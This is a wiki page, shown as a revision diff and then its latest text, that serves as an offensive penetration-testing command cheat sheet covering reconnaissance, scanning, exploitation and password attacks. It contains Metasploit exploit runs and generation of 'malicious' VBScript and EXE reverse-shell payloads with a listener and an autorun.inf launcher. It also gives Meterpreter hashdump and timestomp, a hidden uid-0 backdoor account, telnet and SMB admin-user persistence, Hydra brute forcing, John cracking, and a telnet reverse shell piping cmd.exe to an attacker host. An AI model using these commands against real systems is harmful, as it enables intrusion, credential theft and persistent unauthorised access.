Difference between revisions of "Linux Commands"
(18 intermediate revisions by 3 users not shown) | |||
Line 11: | Line 11: | ||
* Zone transfer | * Zone transfer | ||
<pre>$ dig [@server] <domain> -t AXFR | <pre>$ dig [@server] <domain> -t AXFR</pre> | ||
* Iterative zone transfer | * Iterative zone transfer | ||
Line 23: | Line 23: | ||
$ ./qtrace.pl | $ ./qtrace.pl | ||
</pre> | </pre> | ||
===snmpwalk=== | |||
Dump the ARP table of an snmp server at HOST | |||
<pre>$ snmpwalk -v 2c -c <community> <server> ip.ipNetToMediaTable.ipNetToMediaEntry.ipNetToMediaPhysAddress > arptable.dump</pre> | |||
==Scanning== | ==Scanning== | ||
Line 174: | Line 178: | ||
<pre>$ finger @<target></pre> | <pre>$ finger @<target></pre> | ||
==Exploitation== | |||
===netcat=== | ===netcat=== | ||
Options | Options | ||
Line 187: | Line 192: | ||
Scanning | Scanning | ||
< | <pre>echo "" | nc -v -n -w1 <target> <port-range></pre> | ||
Setting up a relay | |||
<pre>mknod backpipe p | |||
nc -l -p <allowed_port> < backpipe | nc <host> <port> > backpipe</pre> | |||
Relaying port 22 to the local system | |||
<pre>mknod backpipe p | |||
nc -l -p <allowed_port> < backpipe | nc localhost 22 > backpipe</pre> | |||
===Finding SetUID/SetGID programs=== | ===Finding SetUID/SetGID programs=== | ||
<pre>find / -type f \( -perm -4000 -o -perm -2000 \) -print</pre> | <pre>find / -type f \( -perm -4000 -o -perm -2000 \) -print</pre> | ||
Line 204: | Line 216: | ||
===Metasploit=== | ===Metasploit=== | ||
<pre></pre> | Running an exploit | ||
<pre>msf> show exploits | |||
msf> use exploit/windows/smf/ms05_039_php | |||
msf> show payloads | |||
msf> set PAYLOAD windows/shell/bind_tcp | |||
msf> show options | |||
msf> set RHOST 10.10.10.10 | |||
msf> exploit | |||
</pre> | |||
Interacting with sessions | |||
<pre> | |||
msf> sessions -l | |||
msf> sessions -i <N> | |||
</pre> | |||
Creating a malicious VBScript | |||
<pre> | |||
$ msfpayload windows/meterpreter/reverse_tcp LHOST=<lhost> V | |||
$ msfpayload windows/vncinject/reverse_tcp LHOST=<lhost> DisableCourtesyShell=y V | |||
</pre> | |||
Creating a malicious Exe | |||
<pre> | |||
$ msfpayload windows/meterpreter/reverse_tcp LHOST=<lhost> X | |||
$ msfpayload windows/vncinject/reverse_tcp LHOST=<lhost> DisableCourtesyShell=y X | |||
</pre> | |||
Example autorun.inf file to run a malicious exe (goes with Metasploit) | |||
<pre> | |||
[autorun] | |||
open=example.exe | |||
icon=example.exe | |||
</pre> | |||
Metasploit listener | |||
<pre> | |||
$ msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=<lhost> E | |||
$ msfcli multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=<lhost> DisableCourtesyShell=y E | |||
</pre> | |||
===Meterpreter=== | |||
Filesystem commands | |||
<pre>> cd | |||
> lcd | |||
> pwd / getwd | |||
> ls | |||
> cat | |||
> download / upload | |||
> mkdir / rmdir | |||
> edit | |||
> getpid | |||
> getuid | |||
> ps | |||
> kill | |||
> execute | |||
> migrate | |||
> ipconfig | |||
> portfwd | |||
> route | |||
> idletime | |||
> uictl <enable/disable> <keyboard/mouse> | |||
</pre> | |||
Modules | |||
<pre>> use <modulename> | |||
> use priv | |||
> hashdump | |||
> timestomp</pre> | |||
===Creating a user=== | |||
Adding an ordinary user | |||
<pre>useradd <name></pre> | |||
Adding a root user (note: a non-uid-0 account may be required to log in) | |||
<pre>useradd -o -u 0 <name></pre> | |||
===telnet=== | |||
Checking for inetd/xinetd | |||
<pre>ps aux | grep inetd</pre> | |||
Adding telnet to /etc/inetd | |||
<pre>telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd</pre> | |||
Adding telnet to xinetd | |||
* Steal the file from a service that's running (files are in /etc/xinetd.d) | |||
* Change server to "/usr/sbin/in.telnetd" | |||
Restarting inetd/xinetd (the "kill" command with the PID can also be used) | |||
<pre>killall -HUP inetd | |||
killall -HUP xinetd | |||
</pre> | |||
===sshd=== | |||
File should be in /etc/rc*. Ways to enable: | |||
<pre>chkconfig sshd on | |||
service sshd start | |||
/etc/init.d/sshd start</pre> | |||
==Passwords== | |||
===Dictionaries=== | |||
Creating a dictionary | |||
<pre>cat wordlist.txt | sort | uniq > dictionary.txt</pre> | |||
Scraping a Web site | |||
<pre>mkdir /tmp/source | |||
cd /tmp/source | |||
wget -r -l <N> <target> | |||
cd .. | |||
grep -h -r "" source | tr '[:space:]' '\n' | grep -v '<' | sort | uniq > wordlist.lst</pre> | |||
Or, just use [[Passwords|my dictionaries]] | |||
===Account lockout=== | |||
<pre>grep tally /etc/pam.d/* | |||
grep tally /etc/pam.conf</pre> | |||
===pw-inspector=== | |||
Options | |||
* -i -- input file | |||
* -o -- output file | |||
* -m <N> -- minimum length | |||
* -M <N> -- maximum length | |||
* -c <N> -- the number of criteria | |||
** -l -- lower case | |||
** -u -- upper case | |||
** -n -- numbers | |||
** -p -- printable characters (lower/upper/num) | |||
** -s -- special characters (all others) | |||
Example | |||
<pre>cat /tmp/password.list | pw-inspector -m 6 -n -u -l -c 2</pre> | |||
===Hydra=== | |||
Options | |||
* -l <username>/-L <userfile> -- Login name/file | |||
* -p <password>/-P <passfile> -- Password/file | |||
* -e <n|s|ns> -- extended checks (n = null, s = same as username) | |||
* -t <N> -- thread count | |||
<pre>hydra <host> <protocol> <-l <username>|-L <userfile>> <-p <password>|-P <passfile>> [-e <n|s|ns>] [-t <threads>]</pre> | |||
smb password | |||
<pre>hydra <host> smb -l george -P ./list.lst -e ns</pre> | |||
ssh password | |||
<pre>hydra <host> ssh2 -l george -P ./list.lst -e ns</pre> | |||
===John=== | |||
Show cracked passwords | |||
<pre>john --show <passwordfile></pre> | |||
Speed test | |||
<pre>john --test</pre> | |||
Running against a password file | |||
<pre>john <passwordfile></pre> | |||
Specifying type type | |||
<pre>john --format=<format> <passwordfile> | |||
john --format=nt /tmp/pwdump</pre> | |||
Combining passwd/shadow | |||
<pre>unshadow <passwdfile> <shadowfile> > combined.txt | |||
john combined.txt</pre> | |||
===Modified Samba=== | |||
Loading the hash | |||
<pre>export SMBHASH="<LANMAN>:<NT>" | |||
echo $SMBHASH</pre> | |||
Mounting a drive | |||
<pre>./smbmount //<target>/<share> <mountpoint> -o username=<username> | |||
./smbmount //10.10.10.10/c$ /mnt/target -o username=administrator | |||
</pre> | |||
Adding a user | |||
<pre>./net user ADD <username> <password> -I <target> -U <admin_username> | |||
./net rpc group ADDMEM administrators <username> -I <target> -U <admin_username></pre> | |||
==Web== | |||
===nikto.pl=== | |||
Scanning | |||
<pre>nikto.pl -h <host></pre> | |||
Updating | |||
<pre>nikto.pl -update</pre> | |||
Single check | |||
<pre>nikto.pl -Single</pre> | |||
==Fancy tricks== | |||
===Double-telnet=== | |||
On the attacker machine | |||
<pre>nc -l -p 4444 | |||
nc -l -p 5555</pre> | |||
On the victim machine | |||
<pre>telnet <attacker> 4444 | cmd.exe | telnet <attacker> 5555 |
Latest revision as of 09:11, 21 January 2011
Recon
whois
$ whois [-h whois_server] name
nslookup
$ nslookup <target>
dig
- Types of record: NS, A, HINFO, MX, TXT, CNAME, SOA, RP, PTR, SRV
$ dig [@server] <name> [type]
- Zone transfer
$ dig [@server] <domain> -t AXFR
- Iterative zone transfer
$ dig [@server] <domain> -t IXFR=<N>
BiLE.pl
$ ./BiLE <target> <result_file> $ ./BiLE-weigh.pl <site_of_interest> <BiLE_output.mine> $ ./tld-expand.pl $ ./vet-IPrange.pl $ ./qtrace.pl
snmpwalk
Dump the ARP table of an snmp server at HOST
$ snmpwalk -v 2c -c <community> <server> ip.ipNetToMediaTable.ipNetToMediaEntry.ipNetToMediaPhysAddress > arptable.dump
Scanning
tcpdump
Parameters
- -n -- use numbers
- -i <interface>
- -v -- be verbose
- -r <file>/-w <file> -- read from/write to file
- -x -- print hex
- -A -- print ASCII
- -X -- print hex and ASCII
- -s <snaplen> -- length to capture (-s0 for all data)
Filter string
- Protocol
- ether, ip, ip6, arp, rarp, tcp, udp
- Type
- host <host>
- net <network>
- port <portnum>
- portrange <start-end>
- Direction
- src
- dst
- Logic
- and
- or
- Show TCP against target 10.10.10.10 in ASCII
tcpdump [-i tap0] -n -A tcp and dst 10.10.10.10
- Show all UDP from 10.10.10.10
tcpdump [-i tap0] -n udp and src 10.10.10.10
- Show all TCP port 80 packets going to or from host 10.10.10.10
tcpdump [-i tap0] -n tcp and port 80 and host 10.10.10.10
hping3
TCP Flags
- --syn, --fin, --rst, --push, --ack, --urg
Target selection
- --rand-dest
- --interface <int>
Source selection
- --spoof <hostname>
- --rand-source
Port selection
- --destport <port>
- --destport +<port> -- increment by one for each packet received
- --destport ++<port> -- increment by one for each packet sent
- --scan <portrange>
- --baseport <port>
- --keep -- don't increment the source port
Speed options
- --fast, --faster, --flood
- --interval <N> -- interval in seconds
- --interval u<N> -- interval in microseconds
Other options
- --count <N>
- --beep
- --file <filename>
- --data <N>
traceroute
Parameters
- -f <N> -- Initial TTL
- -g <hostlist> -- Loose source route
- -I -- use ICMP Echo instead of UDP
- -m <N> -- maximum number of hops (default 30)
- -n -- numeric
- -p <baseport> -- set the base UDP port
- -w <N> -- wait N seconds (default 5)
Layer Four Traceroute (lft)
http://pwhois.org/lft/index.who
Options
- -u -- use UDP
- -p -- use ICMP echo
- -d <port> -- destination port (default 80)
- -s <port> -- source port
- -L <N> -- length (including layer 3/4 header)
- -A -- look up AS number
- -P -- traceroute via tcp
nmap
Pinging
- -PN -- don't ping
- -PB -- default, ICMP Echo + TCP to port 80
- -PE -- ICMP Echo request
- -PS[portlist] -- TCP SYN
- -PP -- ICMP Timestamp request
- -PM -- ICMP Address Mask request
- -PR -- default on subnet, use ARP to identify hosts
Scanning
- -sT -- TCP Connect scan
- -sS -- SYN scan
- -sA -- ACK scan
- -sF -- FIN scan
- -sN -- Null scan
- -sX -- Xmas Tree scan
- -sM -- Maimon scan
- --scanflags specify your own flags
- -sU -- UDP scan
Fingerprinting
- -O -- OS fingerprint
- -sV -- Version scan
Scripts
- -sC -- run all scripts
- --script=<category,dir,src,etc&/gt;
- --script-trace
Timing
- --paranoid, --sneaky, --polite, --normal, --aggressive, --insane
- --host_timeout, --max_rtt_timeout, --min-rtt-timeout, --initial_rtt_timeout, --max-parallelism, --scan_delay
Other options
- -p<ports>
- -F -- fast (checks only ports in nmap-services)
- --packet-trace
- --traceroute
- --badsum
THC amap
Options
- -q -- quiet (omit closed ports)
- -v -- verbose
- -b -- print banners
Example:
amap -bqv 10.10.10.10 1-50
Enumerating users
Commands
$ cat /etc/passwd
$ finger
$ who
$ w
Remotely:
$ finger @<target>
Exploitation
netcat
Options
- -l -- listen mode
- -L -- listen harder (Windows only)
- -u -- UDP mode
- -p -- local port (in listen mode, the port to listen on)
- -e -- program to execute
- -n -- don't resolve names
- -z -- don't send any data
- -w<N> -- timeout for connects
- -v/-vv -- be verbose
Scanning
echo "" | nc -v -n -w1 <target> <port-range>
Setting up a relay
mknod backpipe p nc -l -p <allowed_port> < backpipe | nc <host> <port> > backpipe
Relaying port 22 to the local system
mknod backpipe p nc -l -p <allowed_port> < backpipe | nc localhost 22 > backpipe
Finding SetUID/SetGID programs
find / -type f \( -perm -4000 -o -perm -2000 \) -print
find /bin -type f \( -perm -4000 -o -perm -2000 \) -print find /sbin -type f \( -perm -4000 -o -perm -2000 \) -print find /usr/bin -type f \( -perm -4000 -o -perm -2000 \) -print find /usr/sbin -type f \( -perm -4000 -o -perm -2000 \) -print find /usr/local/bin -type f \( -perm -4000 -o -perm -2000 \) -print find /usr/local/sbin -type f \( -perm -4000 -o -perm -2000 \) -print
for i in `locate -r "bin$"`; do find $i -type f \( -perm -4000 -o -perm -2000 \) -print; done
Metasploit
Running an exploit
msf> show exploits msf> use exploit/windows/smf/ms05_039_php msf> show payloads msf> set PAYLOAD windows/shell/bind_tcp msf> show options msf> set RHOST 10.10.10.10 msf> exploit
Interacting with sessions
msf> sessions -l msf> sessions -i <N>
Creating a malicious VBScript
$ msfpayload windows/meterpreter/reverse_tcp LHOST=<lhost> V $ msfpayload windows/vncinject/reverse_tcp LHOST=<lhost> DisableCourtesyShell=y V
Creating a malicious Exe
$ msfpayload windows/meterpreter/reverse_tcp LHOST=<lhost> X $ msfpayload windows/vncinject/reverse_tcp LHOST=<lhost> DisableCourtesyShell=y X
Example autorun.inf file to run a malicious exe (goes with Metasploit)
[autorun] open=example.exe icon=example.exe
Metasploit listener
$ msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=<lhost> E $ msfcli multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=<lhost> DisableCourtesyShell=y E
Meterpreter
Filesystem commands
> cd > lcd > pwd / getwd > ls > cat > download / upload > mkdir / rmdir > edit > getpid > getuid > ps > kill > execute > migrate > ipconfig > portfwd > route > idletime > uictl <enable/disable> <keyboard/mouse>
Modules
> use <modulename> > use priv > hashdump > timestomp
Creating a user
Adding an ordinary user
useradd <name>
Adding a root user (note: a non-uid-0 account may be required to log in)
useradd -o -u 0 <name>
telnet
Checking for inetd/xinetd
ps aux | grep inetd
Adding telnet to /etc/inetd
telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd
Adding telnet to xinetd
- Steal the file from a service that's running (files are in /etc/xinetd.d)
- Change server to "/usr/sbin/in.telnetd"
Restarting inetd/xinetd (the "kill" command with the PID can also be used)
killall -HUP inetd killall -HUP xinetd
sshd
File should be in /etc/rc*. Ways to enable:
chkconfig sshd on service sshd start /etc/init.d/sshd start
Passwords
Dictionaries
Creating a dictionary
cat wordlist.txt | sort | uniq > dictionary.txt
Scraping a Web site
mkdir /tmp/source cd /tmp/source wget -r -l <N> <target> cd .. grep -h -r "" source | tr '[:space:]' '\n' | grep -v '<' | sort | uniq > wordlist.lst
Or, just use my dictionaries
Account lockout
grep tally /etc/pam.d/* grep tally /etc/pam.conf
pw-inspector
Options
- -i -- input file
- -o -- output file
- -m <N> -- minimum length
- -M <N> -- maximum length
- -c <N> -- the number of criteria
- -l -- lower case
- -u -- upper case
- -n -- numbers
- -p -- printable characters (lower/upper/num)
- -s -- special characters (all others)
Example
cat /tmp/password.list | pw-inspector -m 6 -n -u -l -c 2
Hydra
Options
- -l <username>/-L <userfile> -- Login name/file
- -p <password>/-P <passfile> -- Password/file
- -e <n|s|ns> -- extended checks (n = null, s = same as username)
- -t <N> -- thread count
hydra <host> <protocol> <-l <username>|-L <userfile>> <-p <password>|-P <passfile>> [-e <n|s|ns>] [-t <threads>]
smb password
hydra <host> smb -l george -P ./list.lst -e ns
ssh password
hydra <host> ssh2 -l george -P ./list.lst -e ns
John
Show cracked passwords
john --show <passwordfile>
Speed test
john --test
Running against a password file
john <passwordfile>
Specifying type type
john --format=<format> <passwordfile> john --format=nt /tmp/pwdump
Combining passwd/shadow
unshadow <passwdfile> <shadowfile> > combined.txt john combined.txt
Modified Samba
Loading the hash
export SMBHASH="<LANMAN>:<NT>" echo $SMBHASH
Mounting a drive
./smbmount //<target>/<share> <mountpoint> -o username=<username> ./smbmount //10.10.10.10/c$ /mnt/target -o username=administrator
Adding a user
./net user ADD <username> <password> -I <target> -U <admin_username> ./net rpc group ADDMEM administrators <username> -I <target> -U <admin_username>
Web
nikto.pl
Scanning
nikto.pl -h <host>
Updating
nikto.pl -update
Single check
nikto.pl -Single
Fancy tricks
Double-telnet
On the attacker machine
nc -l -p 4444 nc -l -p 5555
On the victim machine
telnet <attacker> 4444 | cmd.exe | telnet <attacker> 5555